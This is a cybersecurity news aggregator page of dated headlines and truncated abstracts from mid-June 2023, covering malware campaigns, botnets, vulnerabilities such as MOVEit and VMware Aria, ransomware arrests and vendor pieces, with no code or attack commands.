More details have emerged about the spyware implant that's delivered to iOS devices as part of a campaign called Operation Triangulation. Kaspersky, which discovered the operation after becoming one of the targets at the start of the year, said the malware has a lifespan of 30 days, after which it gets automatically uninstalled unless the time period is extended by the attackers. The Russian cybersecurity company has codenamed the backdoor TriangleDB . "The implant is deployed after the attackers obtain root privileges on the target iOS device by exploiting a kernel vulnerability," Kaspersky researchers said in a new report published today. "It is deployed in memory, meaning that all traces of the implant are lost when the device gets rebooted. Therefore, if the victim reboots their device, the attackers have to reinfect it by sending an iMessage with a malicious attachment, thus launching the whole exploitation chain again." Operation TriangulationThe Hacker News
June 21, 2023 – Botnet
New Condi DDoS botnet targets TP-Link Wi-Fi routers Full Text
Abstract
Researchers discovered a new strain of malware called Condi that targets TP-Link Archer AX21 (AX1800) Wi-Fi routers. Fortinet FortiGuard Labs Researchers discovered a new strain of malware called Condi that was observed exploiting a vulnerability...Security Affairs
June 21, 2023 – Ransomware
May ransomware activity rises behind 8base, LockBit gangs Full Text
Abstract
LockBit was the most active group last month, but NCC Group researchers were surprised by 8base, which started listing victims from attacks that occurred beginning in April 2022.Cyware
June 21, 2023 – Education
Startup Security Tactics: Friction Surveys Full Text
Abstract
When we do quarterly planning , my team categorizes our goals within four evergreen outcomes: Reduce the risk of information security incidents Increase trust in Vanta's information security program Reduce the friction caused by information security controls Use security expertise to support the business In this article, I'm going to focus on number three: reducing friction. Declaring your intentions There is value in making "reducing friction" an explicit goal of your security program. It sets the right tone with your counterparts across the organization, and is one step toward building a positive security culture. The first time I presented those outcomes in a company-wide forum, I received a Slack message from a senior leader who had just joined the company: "fantastic to hear about the security's teams focus on removing invisible security controls. Excellent philosophy for the security team [...] its just awesome too many security teams viThe Hacker News
June 21, 2023 – Vulnerabilities
Critical RCE flaw CVE-2023-20887 in VMware vRealize exploited in the wild Full Text
Abstract
VMware is warning customers that critical remote code execution vulnerability CVE-2023-20887 is being actively exploited in attacks. VMware is warning customers that a critical remote code execution vulnerability in Aria Operations for Networks (Formerly...Security Affairs
June 21, 2023 – General
US and European IT decision-makers have different cloud security priorities Full Text
Abstract
The growing adoption of cloud has elevated cloud security fear for IT teams, as they grapple with the challenges and concerns arising from the widespread use of complex cloud environments while diligently addressing them, according to SUSE.Cyware
June 21, 2023 – Vulnerabilities
Critical ‘nOAuth’ Flaw in Microsoft Azure AD Enabled Complete Account Takeover Full Text
Abstract
A security shortcoming in Microsoft Azure Active Directory (AD) Open Authorization ( OAuth ) process could have been exploited to achieve full account takeover, researchers said. California-based identity and access management service Descope, which discovered and reported the issue in April 2023, dubbed it nOAuth . "nOAuth is an authentication implementation flaw that can affect Microsoft Azure AD multi-tenant OAuth applications," Omer Cohen, chief security officer at Descope, said . The misconfiguration has to do with how a malicious actor can modify email attributes under "Contact Information" in the Azure AD account and exploit the "Log in with Microsoft" feature to hijack a victim account. To pull off the attack, all an adversary has to do is to create and access an Azure AD admin account and modify their email address to that of a victim and take advantage of the single sign-on scheme on a vulnerable app or website. "If the app merges uThe Hacker News
June 21, 2023 – Government
New DOJ unit will focus on prosecuting nation-state cybercrime Full Text
Abstract
The decision to put cyber on equal footing with the division’s three existing sections comes as the DOJ has ramped up its own efforts to defeat botnets, contain or eliminate malware outbreaks and pursue digital criminals around the globe.Cyware
June 21, 2023 – Hacker
Chinese Hacker Group ‘Flea’ Targets American Ministries with Graphican Backdoor Full Text
Abstract
Foreign affairs ministries in the Americas have been targeted by a Chinese state-sponsored actor named Flea as part of a recent campaign that spanned from late 2022 to early 2023. The cyber attacks, per Broadcom's Symantec, involved a new backdoor codenamed Graphican. Some of the other targets included a government finance department and a corporation that markets products in the Americas as well as one unspecified victim in an European country. "Flea used a large number of tools in this campaign," the company said in a report shared with The Hacker News, describing the threat actor as "large and well-resourced." "As well as the new Graphican backdoor, the attackers leveraged a variety of living-off-the-land tools, as well as tools that have been previously linked to Flea." Flea, also called APT15, BackdoorDiplomacy, ke3chang, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda, is an advanced persistent threat group thaThe Hacker News
June 21, 2023 – General
Organizations actively embrace zero trust, integration remains a hurdle Full Text
Abstract
IT teams have made security efforts and progress in zero-trust implementation strategies to establish a new sense of normalcy following the network upheaval caused by the start of the global pandemic.Cyware
June 21, 2023 – Malware
New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks Full Text
Abstract
A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. "The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code," security researchers Joie Salvio and Roy Tay said. An analysis of the malware artifact reveals its ability to terminate other competing botnets on the same host. It, however, lacks a persistence mechanism, meaning the program cannot survive a system reboot. To get around this limitation, the malware deletes multiple binaries that are used to shut down or reboot theThe Hacker News
June 21, 2023 – Botnet
Tsunami Botnet Found Targeting Unsecured Linux SSH Servers Full Text
Abstract
An unidentified cybercrime group was observed brute-forcing vulnerable Linux SSH servers to drop various malware strains, including the Tsunami DDoS bot. Tsunami, also known as Kaiten, is used by a multitude of threat actors as the source code of the botnet is publicly available. administrator ... Read MoreCyware
June 21, 2023 – Vulnerabilities
Alert! Hackers Exploiting Critical Vulnerability in VMware’s Aria Operations Networks Full Text
Abstract
VMware has flagged that a recently patched critical command injection vulnerability in Aria Operations for Networks (formerly vRealize Network Insight) has come under active exploitation in the wild. The flaw, tracked as CVE-2023-20887 , could allow a malicious actor with network access to the product to perform a command injection attack, resulting in remote code execution. It impacts VMware Aria Operations Networks versions 6.x, with fixes released in versions 6.2, 6.3, 6.4, 6.5.1, 6.6, 6.7, 6.8, 6.9, and 6.10 on June 7, 2023. Now according to an update shared by the virtualization services provider on June 20, 2023, the flaw has been weaponized in real-world attacks, although the exact specifics are unknown as yet. "VMware has confirmed that exploitation of CVE-2023-20887 has occurred in the wild," the company noted . Data gathered by threat intelligence firm GreyNoise shows active exploitation of the flaw from two different IP addresses located in the NetherlThe Hacker News
June 20, 2023 – Vulnerabilities
OT:Icefall: Vulnerabilities Identified in Wago Controllers Full Text
Abstract
The flaws were identified as part of the OT:Icefall research that has led to the public disclosure of 61 vulnerabilities impacting more than 100 OT products from 13 vendors.Cyware
June 20, 2023 – Vulnerabilities
Researchers Expose New Severe Flaws in Wago and Schneider Electric OT Products Full Text
Abstract
Three security vulnerabilities have been disclosed in operational technology (OT) products from Wago and Schneider Electric. The flaws, per Forescout, are part of a broader set of shortcomings collectively called OT:ICEFALL , which now comprises a total of 61 issues spanning 13 different vendors. "OT:ICEFALL demonstrates the need for tighter scrutiny of, and improvements to, processes related to secure design, patching and testing in OT device vendors," the company said in a report shared with The Hacker News. The most severe of the flaws is CVE-2022-46680 (CVSS score: 8.8), which concerns the plaintext transmission of credentials in the ION/TCP protocol used by power meters from Schneider Electric. Successful exploitation of the bug could enable threat actors to gain control of vulnerable devices. It's worth noting that CVE-2022-46680 is one among the 56 flaws originally unearthed by Forescout in June 2022. The other two new security holes ( CVE-2023The Hacker News
June 20, 2023 – Breach
3CX data exposed, third-party to blame Full Text
Abstract
A third-party vendor of 3CX, a popular Voice over Internet Protocol (VoIP) comms provider, left an open server and exposed sensitive 3CX data. The issue went under the company’s radar, even though it was recently targeted by North Korean hackers. While...Security Affairs
June 20, 2023 – Denial Of Service
Compromised Linux SSH servers engage in DDoS attacks, cryptomining Full Text
Abstract
A threat actor is mounting dictionary attacks to log into Linux servers with SSH installed and saddle the server with the Tsunami and ShellBot DDoS bots, the XMRig CoinMiner program, and Log Cleaner – a tool for deleting and modifying logs.Cyware
June 20, 2023 – Vulnerabilities
Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices Full Text
Abstract
Zyxel has rolled out security updates to address a critical security flaw in its network-attached storage (NAS) devices that could result in the execution of arbitrary commands on affected systems. Tracked as CVE-2023-27992 (CVSS score: 9.8), the issue has been described as a pre-authentication command injection vulnerability. "The pre-authentication command injection vulnerability in some Zyxel NAS devices could allow an unauthenticated attacker to execute some operating system (OS) commands remotely by sending a crafted HTTP request," Zyxel said in an advisory published today. Andrej Zaujec, NCSC-FI, and Maxim Suslov have been credited with discovering and reporting the flaw. The following versions are impacted by CVE-2023-27992 - NAS326 (V5.21(AAZF.13)C0 and earlier, patched in V5.21(AAZF.14)C0), NAS540 (V5.21(AATB.10)C0 and earlier, patched in V5.21(AATB.11)C0), and NAS542 (V5.21(ABAG.10)C0 and earlier, patched in V5.21(ABAG.11)C0) The alert comes two weeksThe Hacker News
June 20, 2023 – Botnet
New Tsunami botnet targets Linux SSH servers Full Text
Abstract
Researchers warn of an ongoing Tsunami DDoS botnet campaign targeting inadequately protected Linux SSH servers. Researchers from AhnLab Security Emergency response Center (ASEC) have uncovered an ongoing hacking campaign, aimed at poorly protected...Security Affairs
June 20, 2023 – Phishing
Phishing scam takes $950k from DoorDash drivers Full Text
Abstract
The scam involved placing bogus orders, contacting drivers claiming to be from the DoorDash support team, and convincing them to hand over banking details or log in to a fake portal.Cyware
June 20, 2023 – Solution
SaaS in the Real World: How Global Food Chains Can Secure Their Digital Dish Full Text
Abstract
The Quick Serve Restaurant (QSR) industry is built on consistency and shared resources. National chains like McDonald's and regional ones like Cracker Barrel grow faster by reusing the same business model, decor, and menu, with little change from one location to the next. QSR technology stacks mirror the consistency of the front end of each store. Despite each franchise being independently owned and operated, they share subscriptions to SaaS applications, or use multiple tenants of the same application. Each app is typically segmented by store. Corporate IT and Security has access to the entire database, while each franchise has visibility into its own data. These SaaS apps cover everything from CRMs to supply chains to marketing and HR. The data within is used to understand consumer habits, improve marketing campaigns, and manage employees. Like every other industry, QSR SaaS apps contain a wealth of data that needs to be secured. At the same time, we're seeing food chaThe Hacker News
June 20, 2023 – Vulnerabilities
Zyxel addressed critical flaw CVE-2023-27992 in NAS Devices Full Text
Abstract
Zyxel released security updates to address a critical vulnerability affecting its network-attached storage (NAS) devices. Zyxel released security updates to address a critical security flaw, tracked as CVE-2023-27992 (CVSS score: 9.8), affecting...Security Affairs
June 20, 2023 – Malware
Inside of the WASP’s nest: deep dive into PyPI-hosted malware Full Text
Abstract
Virustotal experts identified a number of specific PyPI-based malware campaigns, including Discord Token Grabber V2, Hazard Token Grabber V2, Chromium Stealer, and W4SP Stealer (with Hyperion obfuscator).Cyware
June 20, 2023 – Attack
Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer Full Text
Abstract
A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called RDStealer . "The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News. Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia. In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection. A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads. One of the sub-folders in questionThe Hacker News
June 20, 2023 – Solution
Tackling Data Sovereignty with DDR Full Text
Abstract
Data-centric distributed resilience (DDR) offers a compelling approach to addressing data sovereignty in cybersecurity. As much of our modern life relies upon the cloud, the question of data protection is front of mind for many organizations. Those...Security Affairs
June 20, 2023 – Vulnerabilities
Western Digital Blocks Unpatched Devices From Cloud Services Full Text
Abstract
The move, which began on June 15, comes one month after the company released firmware updates for its My Cloud product line to address multiple security defects, including a critical path traversal bug that leads to remote code execution (RCE).Cyware
June 20, 2023 – Vulnerabilities
ASUS Releases Patches to Fix Critical Security Bugs Impacting Multiple Router Models Full Text
Abstract
Taiwanese company ASUS on Monday released firmware updates to address, among other issues, nine security bugs impacting a wide range of router models. Of the nine security flaws, two are rated Critical and six are rated High in severity. One vulnerability is currently awaiting analysis. The list of impacted products are GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, and TUF-AX5400. Topping the list of fixes are CVE-2018-1160 and CVE-2022-26376 , both of which are rated 9.8 out of a maximum of 10 on the CVSS scoring system. CVE-2018-1160 concerns a nearly five-year-old out-of-bounds write bug in Netatalk versions before 3.1.12 that could allow a remote unauthenticated attacker to achieve arbitrary code execution. CVE-2022-26376 has been described as a memory corruption vulnerability in the Asuswrt firmware that could be triggered by meanThe Hacker News
June 20, 2023 – Vulnerabilities
ASUS addressed critical flaws in some router models Full Text
Abstract
ASUS addressed critical vulnerabilities in multiple router models, urging customers to immediately install firmware updates. ASUS is warning customers to update some router models to the latest firmware to address critical vulnerabilities. The...Security Affairs
June 20, 2023 – Government
Federal Authority Warns Health Sector of TimisoaraHackerTeam Threats Full Text
Abstract
Federal authorities are warning the healthcare sector of an apparent resurgence of TimisoaraHackerTeam threats after a recent attack by the "obscure" ransomware group on a U.S. cancer center.Cyware
June 20, 2023 – Breach
Over 100,000 Stolen ChatGPT Account Credentials Sold on Dark Web Marketplaces Full Text
Abstract
Over 101,100 compromised OpenAI ChatGPT account credentials have found their way on illicit dark web marketplaces between June 2022 and May 2023, with India alone accounting for 12,632 stolen credentials. The credentials were discovered within information stealer logs made available for sale on the cybercrime underground, Group-IB said in a report shared with The Hacker News. "The number of available logs containing compromised ChatGPT accounts reached a peak of 26,802 in May 2023," the Singapore-headquartered company said . "The Asia-Pacific region has experienced the highest concentration of ChatGPT credentials being offered for sale over the past year." Other countries with the most number of compromised ChatGPT credentials include Pakistan, Brazil, Vietnam, Egypt, the U.S., France, Morocco, Indonesia, and Bangladesh. A further analysis has revealed that the majority of logs containing ChatGPT accounts have been breached by the notorious Raccoon info stealThe Hacker News
June 20, 2023 – Malware
Rogue Android Apps Target Pakistani Individuals in Sophisticated Espionage Campaign Full Text
Abstract
Individuals in the Pakistan region have been targeted using two rogue Android apps available on the Google Play Store as part of a new targeted campaign. Cybersecurity firm Cyfirma attributed the campaign with moderate confidence to a threat actor known as DoNot Team , which is also tracked as APT-C-35 and Viceroy Tiger. The espionage activity involves duping Android smartphone owners into downloading a program that's used to extract contact and location data from unwitting victims. "The motive behind the attack is to gather information via the stager payload and use the gathered information for the second-stage attack, using malware with more destructive features," the company said . DoNot Team is a suspected India-nexus threat actor that has a reputation for carrying out attacks against various countries in South Asia. It has been active since at least 2016. While an October 2021 report from Amnesty International linked the group's attack infrastructure toThe Hacker News
June 19, 2023 – Outage
Anonymous Sudan and Killnet strike again, target EIB Full Text
Abstract
The EIB‘s main site is currently down, and the bank has just released a Tweet acknowledging the issue as a ‘cyber attack.’ The EIB interconnection infrastructure has been allegedly disrupted.Cyware
June 19, 2023 – Malware
New Mystic Stealer Malware Targets 40 Web Browsers and 70 Browser Extensions Full Text
Abstract
A new information-stealing malware called Mystic Stealer has been found to steal data from about 40 different web browsers and over 70 web browser extensions. First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants," InQuest and Zscaler researchers said in an analysis published last week. Mystic Stealer, like many other crimeware solutions that are offered for sale, focuses on pilfering data and is implemented in the C programming language. The control panel has been developed using Python. Updates to the malware in May 2023 incorporate a loader component that allows it to retrieve and execute next-stage payloads fetched from a command-and-control (C2) server, making it a more formidable threat. C2 coThe Hacker News
June 19, 2023 – Malware
Experts found components of a complex toolkit employed in macOS attacks Full Text
Abstract
Researchers uncovered a set of malicious files with backdoor capabilities that they believe is part of a toolkit targeting Apple macOS systems. Bitdefender researchers discovered a set of malicious files with backdoor capabilities that are suspected...Security Affairs
June 19, 2023 – Malware
DcRAT Malware Distributed Using Explicit Lures of OnlyFans Full Text
Abstract
The DcRAT malware is being distributed using explicit lures for OnlyFans pages and other adult content. DcRAT offers multiple methods of monetizing infected systems, file stealing, credential theft, and ransomware.Cyware
June 19, 2023 – Malware
Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems Full Text
Abstract
Cybersecurity researchers have uncovered a set of malicious artifacts that they say is part of a sophisticated toolkit targeting Apple macOS systems. "As of now, these samples are still largely undetected and very little information is available about any of them," Bitdefender researchers Andrei Lapusneanu and Bogdan Botezatu said in a preliminary report published on Friday. The Romanian firm's analysis is based on an examination of four samples that were uploaded to VirusTotal by an unnamed victim. The earliest sample dates back to April 18, 2023. Two of the three malicious programs are said to be generic Python-based backdoors that are designed to target Windows, Linux, and macOS systems. The payloads have been collectively dubbed JokerSpy . The first constituent is shared.dat, which, once launched, runs an operating system check (0 for Windows, 1 for macOS, and 2 for Linux) and establishes contact with a remote server to fetch additional instructions for executThe Hacker News
June 19, 2023 – Government
EU member states are urged to restrict without delay 5G equipment from risky suppliers Full Text
Abstract
The European Commission urges member states to limit “without delay” equipment from Chinese suppliers from their 5G networks, specifically Huawei and ZTE. The European Commission told member states to impose restrictions on high-risk suppliers...Security Affairs
June 19, 2023 – Government
– Government
Britain to double cyber defense funding for Ukraine Full Text
Abstract
The United Kingdom on Sunday announced a “major expansion” to its Ukraine Cyber Program, which has seen British experts provide remote incident response support to the Ukrainian government following Russian cyberattacks on critical infrastructure.Cyware
June 19, 2023 – Solution
Introducing AI-guided Remediation for IaC Security / KICS Full Text
Abstract
While the use of Infrastructure as Code (IaC) has gained significant popularity as organizations embrace cloud computing and DevOps practices, the speed and flexibility that IaC provides can also introduce the potential for misconfigurations and security vulnerabilities. IaC allows organizations to define and manage their infrastructure using machine-readable configuration files, which are typically version-controlled and treated as code. IaC misconfigurations are mistakes, or oversights, in the configuration of infrastructure resources and environments that happen when using IaC tools and frameworks. Discover the power of a comprehensive AppSec platform. Download this new whitepaper to discover how to effortlessly integrate application security into every stage of the software development life cycle. Learn about the role of integration and automation, the 7 requirements for choosing an AppSec platform, and how Checkmarx One™ simplifies security. Misconfigurations in IaC caThe Hacker News
June 19, 2023 – Criminals
Diicot cybercrime gang expands its attack capabilities Full Text
Abstract
Researchers found evidence that Diicot threat actors are expanding their capabilities with new payloads and the Cayosin Botnet. Cado researchers recently detected an interesting attack pattern linked to an emerging cybercrime group tracked as Diicot...Security Affairs
June 19, 2023 – Vulnerabilities
Third Bug in MOVEit Transfer Found Full Text
Abstract
Progress Software has reported a third vulnerability in its MOVEit Transfer application. The bug, which still awaits a CVE identifier, is an SQL injection vulnerability. The company strongly advised customers to disable all HTTP and HTTPS traffic to MOVEit Transfer on ports 80 and 443. This precaut ... Read MoreCyware
June 19, 2023 – Hacker
State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments Full Text
Abstract
Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques. "The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs," Lior Rochberger, senior threat researcher at Palo Alto Networks, said in a technical deep dive published last week. The company's Cortex Threat Research team is tracking the activity under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), describing it as a "true advanced persistent threat." The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services ( IIS ) and Microsoft Exchange serves to infiltrate target networks. Palo Alto Networks said it deteThe Hacker News
June 19, 2023 – Business
Content Moderation Tech Startup Trust Lab Snags $15M Investment Full Text
Abstract
The Palo Alto company said the $15 million Series A was led by U.S. Venture Partners (USVP) and Foundation Capital, two prominent investment firms betting on cybersecurity startups.Cyware
June 19, 2023 – Denial Of Service
Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions Full Text
Abstract
Microsoft on Friday attributed a string of service outages aimed at Azure, Outlook, and OneDrive earlier this month to an uncategorized cluster it tracks under the name Storm-1359 . "These attacks likely rely on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools," the tech giant said in a post on Friday. Storm-#### (previously DEV-####) is a temporary designation the Windows maker assigns to unknown, emerging, or developing groups whose identity or affiliation hasn't been definitively established yet. While there is no evidence that any customer data was accessed or compromised, the company noted the attacks "temporarily impacted availability" of some services. Redmond said it further observed the threat actor launching layer 7 DDoS attacks from multiple cloud services and open proxy infrastructures. This includes HTTP(S) flood attacks, which bombard the target services with aThe Hacker News
June 18, 2023 – Outage
Microsoft: June Outlook and cloud platform outages were caused by DDoS Full Text
Abstract
Microsoft confirmed that the recent outages to the Azure, Outlook, and OneDrive services were caused by cyber attacks. In early June, Microsoft suffered severe outages for some of its services, including Outlook email, OneDrive file-sharing apps,...Security Affairs
June 18, 2023 – Criminals
Reddit Files: BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit Full Text
Abstract
The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from the Reddit in February cyberattack. In February, the social news aggregation platform Reddit suffered a security breach, attackers gained unauthorized access to internal documents,...Security Affairs
June 18, 2023 – Government
US govt offers $10 million bounty for info linking Clop ransomware gang to a foreign government. Full Text
Abstract
The U.S. government announced up to a $10 million bounty for information linking the Clop ransomware gang to a foreign government. The US goverment is offering up to a $10 million bounty for information linking CL0P Ransomware Gang or any other threat...Security Affairs
June 18, 2023 – General
Security Affairs newsletter Round 424 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Law...Security Affairs
June 17, 2023 – Criminals
Law enforcement shutdown a long-standing DDoS-for-hire service Full Text
Abstract
Polish police, as part of the international law enforcement operation PowerOFF, dismantled a DDoS-for-hire service that has been active since at least 2013. An international operation codenamed PowerOff led to the shutdown of a DDoS-for-hire service...Security Affairs
June 17, 2023 – Vulnerabilities
A simple bug exposed access to thousands of smart security alarm systems Full Text
Abstract
U.S. power and electronics giant Eaton has fixed a security vulnerability that allowed a security researcher to remotely access thousands of smart security alarm systems.Cyware
June 17, 2023 – Botnet
From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet Full Text
Abstract
Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named Diicot , revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the Romanian organized crime and anti-terrorism policing unit ," Cado Security said in a technical report. "In addition, artifacts from the group's campaigns contain messaging and imagery related to this organization." Diicot (née Mexals) was first documented by Bitdefender in July 2021, uncovering the actor's use of a Go-based SSH brute-forcer tool called Diicot Brute to breach Linux hosts as part of a cryptojacking campaign. Then earlier this April, Akamai disclosed what it described as a "resurgence" of the 2021 activity that's believed to have started around October 2022, netting the actor about $10,000 in illicit profits. "The attackers use a long chThe Hacker News
June 17, 2023 – Vulnerabilities
Third MOVEit bug fixed a day after PoC exploit made public Full Text
Abstract
Details of the latest vulnerability, tracked as CVE-2023-35708, were made public Thursday; proof-of-concept (PoC) exploit for the flaw, now fixed today, also emerged on Thursday. Progress Software issued a fix for it on Friday.Cyware
June 16, 2023 – Policy and Law
Justice Department Charges Russian National for LockBit Ransomware Attacks Full Text
Abstract
The 20-year old allegedly participated in a conspiracy to commit wire fraud and intentionally damage protected computers and make ransom demands.Lawfare
June 16, 2023 – Criminals
A Russian national charged for committing LockBit Ransomware attacks Full Text
Abstract
DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses. The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous...Security Affairs
June 16, 2023 – Malware
ChamelDoH: New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling for Covert CnC Full Text
Abstract
The threat actor known as ChamelGang has been observed using a previously undocumented implant to backdoor Linux systems, marking a new expansion of the threat actor's capabilities. The malware, dubbed ChamelDoH by Stairwell, is a C++-based tool for communicating via DNS-over-HTTPS ( DoH ) tunneling. ChamelGang was first outed by Russian cybersecurity firm Positive Technologies in September 2021, detailing its attacks on fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan. Attack chains mounted by the actor have leveraged vulnerabilities in Microsoft Exchange servers and Red Hat JBoss Enterprise Application to gain initial access and carry out data theft attacks using a passive backdoor called DoorMe. "This is a native IIS module that is registered as a filter through which HTTP requests and responses are processed," Positive Technologies said at the time. "Its principle of operation is unusual: the backThe Hacker News
June 16, 2023 – Attack
Oil and gas giant Shell is another victim of Clop ransomware attacks Full Text
Abstract
British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group. Oil and Gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign...Security Affairs
June 16, 2023 – Malware
Balada Injector Campaign Hacks WordPress Sites Using Unpatched Plugins Full Text
Abstract
Balada leverages functions written in the Go language to spread itself and maintain persistence by executing a series of attacks, cross-site infections, and installation of backdoors.Cyware
June 16, 2023 – Education
Activities in the Cybercrime Underground Require a New Approach to Cybersecurity Full Text
Abstract
As Threat Actors Continuously Adapt their TTPs in Today's Threat Landscape, So Must You Earlier this year, threat researchers at Cybersixgill released the annual report, The State of the Cybercrime Underground . The research stems from an analysis of Cybersixgill's collected intelligence items throughout 2022, gathered from the deep, dark and clear web. The report examines the continuous evolution of threat actors' tactics, tools, and procedures (TTPs) in the Digital Age – and how organizations can adapt to reduce risk and maintain business resilience. This article summarizes a few of the report's findings, including trends in credit card fraud, observations about cryptocurrency, AI developments and how they're lowering barriers to entry to cybercrime, and the rise of cybercriminal "as-a-service" activities. Further below, I also discuss the need for a new security approach, combining attack surface management (ASM) and cyber threat intelligence (CTI) toThe Hacker News
June 16, 2023 – Vulnerabilities
Progress fixed a third flaw in MOVEit Transfer software Full Text
Abstract
Progress Software addressed a third vulnerability impacting its MOVEit Transfer application that could lead to privilege escalation and information disclosure. Progress Software disclosed a new SQL injection vulnerability impacting its MOVEit Transfer...Security Affairs
June 16, 2023 – Breach
Two Energy Department Entities Breached as Part of Massive MOVEit Transfer Compromise Full Text
Abstract
Multiple federal agencies, including two Department of Energy entities, were victims of a cyberattack that resulted from a widespread vulnerability in MOVEit file transfer software, federal officials said Thursday.Cyware
June 16, 2023 – Criminals
20-Year-Old Russian LockBit Ransomware Affiliate Arrested in Arizona Full Text
Abstract
The U.S. Department of Justice (DoJ) on Thursday unveiled charges against a Russian national for his alleged involvement in deploying LockBit ransomware to targets in the U.S., Asia, Europe, and Africa. Ruslan Magomedovich Astamirov, 20, of Chechen Republic has been accused of perpetrating at least five attacks between August 2020 and March 2023. He was arrested in the state of Arizona last month. "Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware," the DoJ said . Astamirov, as part of his LockBit-related activities, managed various email addresses, IP addresses, and other online accounts to deploy the ransomware and communicate with the victims. Law enforcement agencies said they were able to trace a chunk of an unnamed victim's ransom payment to a virtual currency address operated by AstamThe Hacker News
June 16, 2023 – Malware
Updated Android spyware GravityRAT steals WhatsApp Backups Full Text
Abstract
An updated version of the Android remote access trojan GravityRAT can steal WhatsApp backup files and can delete files ESET researchers discovered an updated version of Android GravityRAT spyware that steals WhatsApp backup files and can delete files....Security Affairs
June 16, 2023 – Hacker
New Diicot Threat Group Targets SSH Servers with Brute-Force Malware Full Text
Abstract
Deploying Cayosin botnet, an off-the-shelf Mirai-based botnet agent to target routers running the Linux-based OS OpenWRT is a newly adopted tactic, indicating that the group changes its attack style after examining its targets.Cyware
June 16, 2023 – Vulnerabilities
Third Flaw Uncovered in MOVEit Transfer App Amidst Cl0p Ransomware Mass Attack Full Text
Abstract
Progress Software on Thursday disclosed a third vulnerability impacting its MOVEit Transfer application, as the Cl0p cybercrime gang deployed extortion tactics against affected companies. The new flaw , which is being tracked as CVE-2023-35708 , also concerns an SQL injection vulnerability that "could lead to escalated privileges and potential unauthorized access to the environment." The company is urging its customers to disable all HTTP and HTTPs traffic to MOVEit Transfer on ports 80 and 443 to safeguard their environments while a fix is being prepared to address the weakness. The cloud managed file transfer solution has been fully patched. The revelation comes a week after Progress divulged another set of SQL injection vulnerabilities ( CVE-2023-35036 ) that it said could be weaponized to access the application's database content. The vulnerabilities join CVE-2023-34362 , which was exploited as a zero-day by the Clop ransomware gang in data theft attacksThe Hacker News
June 15, 2023 – Malware
SeroXen Incorporates Latest BatCloak Engine Iteration Full Text
Abstract
SeroXen malware uses advanced, fully undetectable (FUD) techniques to infect victims with hVNC-capable malware. The malware uses highly obfuscated batch files as the loading mechanism, utilizing the BatCloak obfuscation engine.Cyware
June 15, 2023 – Cryptocurrency
Ransomware Hackers and Scammers Utilizing Cloud Mining to Launder Cryptocurrency Full Text
Abstract
Ransomware actors and cryptocurrency scammers have joined nation-state actors in abusing cloud mining services to launder digital assets, new findings reveal. "Cryptocurrency mining is a crucial part of our industry, but it also holds special appeal to bad actors, as it provides a means to acquire money with a totally clean on-chain original source," blockchain analytics firm Chainalysis said in a report shared with The Hacker News. Earlier this March, Google Mandiant disclosed North Korea-based APT43's use of the hash rental and cloud mining services to obscure the forensic trail and wash the stolen cryptocurrency "clean." Cloud mining services allow users to rent a computer system and use that computer's hash power to mine cryptocurrencies without having to manage the mining hardware themselves. But according to Chainalysis, it's not just nation-state hacking crews who are leveraging such services in the wild. In one example highlighted byThe Hacker News
June 15, 2023 – Government
The Dynamics of the Ukrainian IT Army’s Campaign in Russia Full Text
Abstract
